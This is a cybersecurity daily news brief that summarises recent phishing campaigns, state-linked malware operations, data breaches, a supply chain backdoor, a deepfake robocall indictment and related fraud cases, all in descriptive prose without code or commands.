Daily Brief

A Moroccan cybercrime group, Storm-0539, also known as Atlas Lion, is conducting gift card fraud, stealing up to $100,000 daily from various companies. Microsoft highlighted the group's use of sophisticated email and SMS phishing attacks to bypass multi-factor authentication and steal digital gift card values. Targets include major retailers, luxury brands, and fast-food chains, with criminals selling stolen gift cards at discounted rates on the black market. The group has evolved from deploying malware on point-of-sale devices to exploiting cloud-based gift card services and carrying out extensive reconnaissance within victim's cloud environments. Tactics include the creation of fraudulent gift cards, modifying email addresses on unredeemed gift cards, and the use of internal company mailing lists for distribution of phishing attacks. Increased vigilance by companies, including monitoring suspicious logins and enhancing authentication processes, is advised to protect against such threats. Storm-0539 uses legitimate compromised emails to add authenticity to their phishing messages and further employs deceit by setting up fake non-profit accounts on cloud platforms to remain undetected.

Phishing attacks are increasingly commonplace due to shifts to cloud technology, inadequate password management, and advances in webpage design. Security measures like email protection, firewall implementation, and workforce education have been deployed but phishing remains a significant threat. The LayerX report provides insights into current phishing trends and evaluates organizational defenses against such cyber threats. The study suggests implementing a browser security platform to effectively block phishing attacks that bypass other security layers. This platform acts directly at the potential point of attack—the browser—by detecting malicious pages, preventing password theft, and terminating unsafe sessions. It also offers deep session inspection, allowing for real-time surveillance, monitoring, and enforcement of security policies. LayerX's analysis highlights the necessity for IT and security professionals to incorporate browser-based security technologies into their phishing defense strategies.

Phishing campaigns are increasingly using Cloudflare Workers to create adversary-in-the-middle (AitM) phishing sites targeting major email and webmail providers like Microsoft and Gmail. Netskope discovered that these phishing attacks primarily affected sectors such as technology, financial services, and banking across Asia, North America, and Southern Europe. Attackers use HTML smuggling to assemble phishing pages on the victim’s side, evading detection by circumventing security measures. Phishing sites prompt victims to enter their Microsoft credentials to access a supposed PDF document, capturing both credentials and multi-factor authentication (MFA) codes. The campaigns utilize a modified open-source Cloudflare toolkit to intercept and collect data from victims' web requests. The use of Generative AI (GenAI) by cybercriminals is on the rise, helping them craft more convincing phishing emails and create malware-laden file attachments designed to overwhelm security scans. Cybersecurity experts have identified an increase in DNS tunneling techniques used in phishing campaigns to track victim interactions and scan for network vulnerabilities. The sophistication of phishing tools and techniques necessitates more stringent and advanced cybersecurity measures to protect against evolving threats.

The Transparent Tribe group, associated with Pakistan, has launched cyber attacks on India’s government and defense sectors. These attacks employ sophisticated malware developed in Python, Golang, and Rust and are delivered primarily through spear-phishing campaigns. BlackBerry Research reported the activity spans from late 2023 to April 2024 and targets three key firms in Bengaluru involved with the Department of Defense Production. Malicious tools used include various RATs and information gatherers like GLOBSHELL and PYSHELLFOX, adapting over years to evade detection and enhance efficacy. The malware exploits reputable online services such as Discord and Google Drive to orchestrate command and control communications. Attack methods observed include the use of malicious links, ZIP archives, and ISO images, exploiting India’s reliance on Linux-based systems. Persistent threats from Transparent Tribe highlight a critical ongoing risk to India's national security infrastructure with potential espionage motives.

In February 2024, Cencora, a significant US drug wholesaler previously known as AmerisourceBergen, suffered a data breach impacting over a dozen major pharmaceutical companies. Affected companies including Bayer, GlaxoSmithKline, Novartis, and others have begun reporting data losses to the California Attorney General, linking the breach to the theft of personal and health-related information. Compromised data may include names, addresses, birth dates, health diagnoses, and prescription details; there is currently no evidence of misuse or public disclosure of the stolen data. The breach's full scope on individual data remains unclear as companies are not mandated to disclose specific numbers of affected individuals to the California Attorney General. Cencora disclosed the breach in a February SEC filing but mentioned that it has not materially impacted their operations or financial condition, though the full consequences are still being evaluated. Additionally, cybersecurity vulnerabilities elsewhere include recent Chrome zero-day exploits and critical flaws found in VMware storage controllers potentially affecting system security through denial-of-service attacks or code execution. The U.S. Environmental Protection Agency (EPA) also reported critical cybersecurity failures in over 70% of inspected U.S. water systems, highlighting an increased risk of cyber attacks on national infrastructure.

Hackers are utilizing a Python clone of the Minesweeper game to camouflage malicious scripts targeting financial organizations in Europe and the U.S. The attack is executed through phishing emails impersonating a medical center, inducing recipients to download a malware-laden .SCR file. Malicious code within the file downloads additional scripts that install SuperOps RMM, a legitimate remote management software abused to gain unauthorized access. At least five breaches in financial and insurance institutions have been linked to this malware deployment tactic. The Minesweeper game code is used to mask the malicious payload, deceiving security systems into treating the download as harmless. SuperOps RMM presence or related network activity in non-client systems should be treated as indicators of a security breach. Ukrainian cybersecurity agencies have identified the threat actor as 'UAC-0188' and have provided additional indicators of compromise for organizational defense.

A malvertising campaign exploited Google Ads during the Windows launch of the Arc web browser, leading users to download malware-infected installers. Cybercriminals set up advertisements that appeared legitimate and used similar URLs to the Arc browser's genuine site to deceive users. Clicking on these deceptive ads redirected users to typo-squatted domains where trojanized installers were downloaded. These installers fetched additional harmful payloads, including a file named 'bootstrap.exe' that commanded further malicious operations. Malwarebytes identified another infection method involving a Python executable that manipulated system processes to execute harmful commands. The final payload suspected in these attacks is an information-stealing malware, although definitive identification hasn't been confirmed. Despite the actual Arc browser installing correctly, the malicious operations proceeded unnoticed in the background. The report highlighted the continuous effectiveness of using high-profile software launches to distribute malware and emphasized the need for cautious downloading practices.

An Indian man, Chirag Tomar, pleaded guilty to wire fraud conspiracy involving over $37 million stolen via a counterfeit Coinbase Pro website. Tomar was apprehended at Atlanta airport on December 20, 2023, following joint investigations led by the U.S. Secret Service and the FBI in Nashville. The fraudulent activity began in June 2021 when Tomar, along with accomplices, set up a fake website mimicking Coinbase Pro to phish for user credentials. Victims were deceived into entering their login details and two-factor authentication codes into the fake site, thinking they were accessing their real Coinbase accounts. Fraudsters also tricked victims into installing remote desktop software under the guise of Coinbase customer support, gaining direct access to their computers and subsequently their genuine Coinbase accounts. The scammers converted the stolen cryptocurrency into various forms or cash and distributed the proceeds among themselves. Proceeds from the criminal activity were used by Tomar to fund an extravagant lifestyle, purchasing luxury cars, high-end watches, and international trips. Tomar faces up to 20 years in prison and a fine of $250,000, with his sentencing date pending.

In February 2024, Cencora, a major pharmaceutical services provider, experienced a significant data breach impacting the personal information of US patients. Eleven major pharmaceutical companies, later revised to include three additional firms, were affected by the breach due to their partnership with Cencora. The breach was first disclosed by Cencora in a Form 8-K filing with the SEC, noting unauthorized access to their systems and data exfiltration. Information exposed includes full names, addresses, health diagnoses, medications, and prescriptions. There's no current evidence that the stolen data has been publicly disclosed or used for fraudulent purposes. Cencora has offered two years of free identity protection and credit monitoring services to affected individuals through Experian. The company has not publicly revealed the extent of the breach or the number of individuals affected, and has declined further comment beyond a recent news release.

Cybersecurity experts discovered a critical flaw in the AI-as-a-service provider Replicate, allowing potential access to customer AI models and sensitive information. The vulnerability involved the exploitation of AI model packaging methods that could enable arbitrary code execution and cross-tenant attacks. Security researchers successfully demonstrated remote code execution via a malicious model uploaded to Replicate, leveraging elevated privileges on the platform. An associated TCP connection and a central Redis server were manipulated to insert rogue tasks, risking the integrity and reliability of other customers' AI outputs. Attack techniques could potentially expose proprietary knowledge, sensitive data, and personally identifiable information used in training AI models. The flaw was responsibly disclosed to Replicate in January 2024 and has been subsequently addressed with no evidence of exploitation in the wild. This incident underscores ongoing security risks in AI platforms, highlighting the potential misuse of malicious models to access and manipulate sensitive data across tenants.

Steven Kramer, a 54-year-old political consultant from New Orleans, has been indicted on 13 felony counts of voter suppression and 13 misdemeanor counts related to impersonation of candidate Joe Biden. Kramer created a deepfake robocall using AI to clone Biden's voice and used caller ID spoofing; he spent $500 on the complete operation and notably $150 on the deepfake component. The robocall was aimed at suppressing voter turnout in the New Hampshire Democratic primary by discouraging Biden supporters from voting, purportedly to boost House Rep Dean Phillips' (D-MN) candidacy. More than 5,000 voters received the deceptive call, which Kramer claimed was a significant political tactic for a low budget. The FCC has proposed a first-of-its-kind $6 million fine against Kramer for election misinformation and unlawful call spoofing, marking a major enforcement effort in tackling deceptive political communications. The case highlights regulatory responses to new forms of election interference, including the misuse of artificial intelligence and digital communications technologies. Both the New Hampshire Attorney General and the FCC have taken actions signaling strong deterrent measures against anyone considering similar tactics to influence election outcomes.

A hacker defaced the pcTattletale website, a spyware tool used in Wyndham hotels, leaking its database and source code. pcTattletale was reported by Vice to leak real-time screenshots from devices, posing as child and employee monitoring software. Security researcher Eric Daigle discovered a severe API vulnerability in pcTattletale, allowing the capture of screenshots from any installed device. The developers of pcTattletale ignored multiple contacts to fix the security flaw, leading to unresolved security risks. A hacker exploited a different vulnerability using a Python script to extract AWS credentials, accessing the spyware’s critical data. The leaked information includes 20 archives of source code and data, further compromising pcTattletale's security integrity. Microsoft identifies pcTattletale as a potential threat, capable of recording keystrokes and screen images, risking sensitive user information. Despite the exposure, there has been no official response from pcTattletale's developer, Bryan Fleming, regarding the incident.

Best Buy and its Geek Squad were the most impersonated organizations in scams for 2023, with over 52,000 reports. Microsoft impersonators garnered the highest financial gain, stealing approximately $60 million. Amazon and PayPal were also heavily targeted, leading to losses of $19 million and $16 million respectively. Scammers used various communication methods, with phone and email being the most common, but social media scams proved to be the most costly. Popular payment methods among scammers included cryptocurrency, bank transfers, and gift cards. The Federal Trade Commission (FTC) advises the public to be cautious with payment demands, especially those specifying cryptocurrencies or gift cards. Overall, the top ten most impersonated companies accounted for significant financial losses, with figures ranging from $2 million to $60 million.

Courtroom audio-visual software from Justice AV Solutions was compromised in a suspected supply chain attack, affecting over 10,000 courtrooms. Security research team from Rapid7 discovered the backdoor after an alert from a customer's MDR solution. The compromised version, JAVS Viewer v8.3.7, featured a malicious binary, fffmpeg.exe, linked to known malware families and signed by an unauthorized entity. Rapid7 advises a complete re-imaging of affected endpoints and resetting of credentials to mitigate the threat fully. The malware could bypass anti-malware protections, collect system data, download additional payloads, and scrape browser credentials. Rapid7 traced the initial alert back to a discovery by another researcher, indicating that the malware was hosted on JAVS’ official download page. JAVS responded by working with authorities, reassessing their release and certification process, and asserting that their technicians validate installations. The full extent of the attack’s impact remains unknown as investigations continue.

Hackers targeted MITRE Corporation using zero-day vulnerabilities in Ivanti Connect Secure (ICS), exploiting two critical flaws. They created rogue virtual machines (VMs) within MITRE’s VMware environment to evade detection and maintain persistent, undetected access. The attackers, identified as UNC5221, leveraged compromised administrative credentials to control VMware infrastructure, deploying backdoors and web shells. Among the tools used were a Python-based tunneling tool for SSH connections, a Golang-based backdoor named BRICKSTORM, and web shells BEEFLUSH and BUSHWALK. The adversaries' tactics included using standard VMware accounts for API calls that mapped network drives, further hiding their activities. MITRE has proposed countermeasures like enabling secure boot and provided PowerShell scripts to help identify and mitigate hidden VM-related threats. The incident highlights the need for continuous vigilance and adaptation in organizational cybersecurity strategies.